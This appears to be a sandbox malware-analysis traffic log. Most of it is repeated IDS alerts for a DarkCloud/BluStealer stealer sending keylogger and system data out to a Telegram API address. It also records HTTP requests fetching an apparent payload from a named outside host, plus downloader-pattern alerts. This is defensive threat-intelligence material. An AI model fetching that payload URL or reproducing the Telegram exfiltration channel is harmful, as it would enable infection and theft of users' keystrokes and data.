            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60393 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60393 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60443 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60443 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60443 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60417 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60417 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60417 -> 149.154.167.220:443
            Source: unknown | DNS query: name: api.telegram.org
            Source: global traffic | TCP traffic: 192.168.2.10:60364 -> 162.159.36.2:53
            Source: global traffic | HTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1 | Host: alcomax.com.co | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1 | Host: alcomax.com.co | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 149.154.167.220
            Source: Joe Sandbox View | IP Address: 162.55.60.2
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown | DNS query: name: showip.net
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49716 -> 162.55.60.2:80
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49793 -> 162.55.60.2:80
